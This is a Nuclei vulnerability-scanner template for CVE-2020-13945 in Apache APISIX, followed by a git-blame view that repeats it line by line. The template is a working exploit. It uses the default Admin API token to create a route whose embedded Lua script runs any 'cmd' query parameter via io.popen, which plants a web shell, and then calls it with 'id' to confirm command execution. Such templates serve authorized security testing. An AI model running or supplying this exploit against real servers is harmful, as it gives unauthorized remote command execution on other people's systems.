nuclei-templates/cves/2020/CVE-2020-13945.yaml

id: CVE-2020-13945

info:
  name: Apache APISIX's Admin API Default Access Token (RCE)
  author: pdteam
  severity: medium
  description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions
    1.2, 1.3, 1.4, 1.5.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13945
    - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-13945
  tags: cve,cve2020,apache,apisix,rce,intrusive

requests:
  - raw:
      - |
        POST /apisix/admin/routes HTTP/1.1
        Host: {{Hostname}}
        X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
        Content-Type: application/json

        {
          "uri":"/{{randstr}}",
          "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f =        assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
          "upstream":{
            "type":"roundrobin",
            "nodes":{
              "example.com:80":1
            }
          }
        }

      - |
        GET /{{randstr}}?cmd=id HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"action":"create"'
          - '"script":'
          - '"node":'
        condition: and

      - type: status
        status:
          - 201

    extractors:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
Added Apache APISIX's Admin API Default Access Token (RCE) (#3544) 2022-01-16 16:38:55 +00:00			`id: CVE-2020-13945`

			`info:`
			`name: Apache APISIX's Admin API Default Access Token (RCE)`
			`author: pdteam`
Auto Generated CVE annotations [Sun Jan 16 16:40:51 UTC 2022] :robot: 2022-01-16 16:40:51 +00:00			`severity: medium`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions`
			`1.2, 1.3, 1.4, 1.5.`
Added Apache APISIX's Admin API Default Access Token (RCE) (#3544) 2022-01-16 16:38:55 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-13945`
			`- https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945`
Auto Generated CVE annotations [Sun Jan 16 16:40:51 UTC 2022] :robot: 2022-01-16 16:40:51 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.5`
Auto Generated CVE annotations [Sun Jan 16 16:40:51 UTC 2022] :robot: 2022-01-16 16:40:51 +00:00			`cve-id: CVE-2020-13945`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2020,apache,apisix,rce,intrusive`
Added Apache APISIX's Admin API Default Access Token (RCE) (#3544) 2022-01-16 16:38:55 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /apisix/admin/routes HTTP/1.1`
			`Host: {{Hostname}}`
			`X-API-KEY: edd1c9f034335f136f87ad84b625c8f1`
			`Content-Type: application/json`

			`{`
			`"uri":"/{{randstr}}",`
			`"script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",`
			`"upstream":{`
			`"type":"roundrobin",`
			`"nodes":{`
			`"example.com:80":1`
			`}`
			`}`
			`}`

			`- \|`
			`GET /{{randstr}}?cmd=id HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- '"action":"create"'`
			`- '"script":'`
			`- '"node":'`
			`condition: and`

			`- type: status`
			`status:`
			`- 201`

			`extractors:`
			`- type: regex`
			`regex:`
			`- "((u\|g)id\|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"`